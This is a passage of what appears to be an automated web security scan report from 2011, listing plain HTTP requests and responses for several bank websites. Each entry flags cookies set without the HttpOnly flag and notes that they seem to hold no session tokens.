Request
GET /services/standard-overdraft-practices.aspx?WT.ac=standardoverdraftpractices HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:15:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:25:35 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 27355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fsmall-business%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 193
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fsmall-business%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/business-banking-online.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.citizensbank.com//small-business/business-banking-online.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 189
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.citizensbank.com//small-business/business-banking-online.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/business-checking-accounts.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.citizensbank.com//small-business/business-checking-accounts.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 192
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.citizensbank.com//small-business/business-checking-accounts.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/business-loans.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.citizensbank.com//small-business/business-loans.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 180
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.citizensbank.com//small-business/business-loans.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /spanish/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:37:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:47:53 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 15768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-banking/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:15:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:25:26 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 27709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-banking/overview.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:15:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/error.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 138
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2ferror.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-loans/overview.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:16:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.citizensbank.com//student-loans/overview.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 173
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.citizensbank.com//student-loans/overview.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-services/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:14:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:24:06 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 26105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-services/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:14:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:24:05 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 26105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tools/SiteMap.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:37:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:47:46 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 156512
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tools/leaving.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:16:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Length: 0
The following cookies were issued by the application and do not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
HiddenPopup=popup=False; path=/
HiddenError=error=False; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tools/regionalgateway.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:16:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: HiddenPopup=popup=False; path=/ Set-Cookie: HiddenError=error=False; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 17174
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /trufitstudentloan/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:15:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:25:35 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 46321
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.chase.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:00:30 GMT Content-length: 22894 Content-type: text/html Set-Cookie: v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Last-modified: Wed, 02 Feb 2011 15:05:03 GMT Etag: "596e-4d49729f" Accept-ranges: bytes Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head> ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wamuwelcome3/ HTTP/1.1 Host: www.chase.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:00:50 GMT Content-length: 14892 Content-type: text/html Set-Cookie: v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Last-modified: Thu, 06 Jan 2011 22:25:12 GMT Etag: "3a2c-4d264148" Accept-ranges: bytes
The following cookie was issued by the application and does not have the HttpOnly flag set:
ARPT=OVMPLYSbac2dCKIYK; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.chasemilitary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=OVMPLYSbac2dCKIYK; path=/ Cache-Control: private Content-Length: 68537 Content-Type: text/html; charset=utf-8 X-Powered-By: ASP.NET Set-Cookie: ASP.NET_SessionId=4524pqmzsbws5k55rtryev45; path=/; HttpOnly Date: Wed, 02 Feb 2011 22:16:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=5DDC70D33F22CF8D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chasestudentloans.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /studentloans HTTP/1.1 Host: www.chasestudentloans.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Content-Length: 169 Content-Type: text/html Location: http://www.chasestudentloans.com/studentloans/ Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=5DDC70D33F22CF8D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chasestudentloans.com Date: Wed, 02 Feb 2011 22:16:37 GMT Connection: close
<head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.chasestudentloans.com/studentloans/">here</a></body>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /401K_notice.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:18:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:28:05 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 5704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about-us/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:54 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 17629
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /branchlocator/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 27207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards-and-rewards/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:17:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fcards-and-rewards%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 196
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcards-and-rewards%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards-and-rewards/default.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:17:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fcards-and-rewards%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 196
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcards-and-rewards%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards-and-rewards/defaultbroad.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:14 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 21253
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
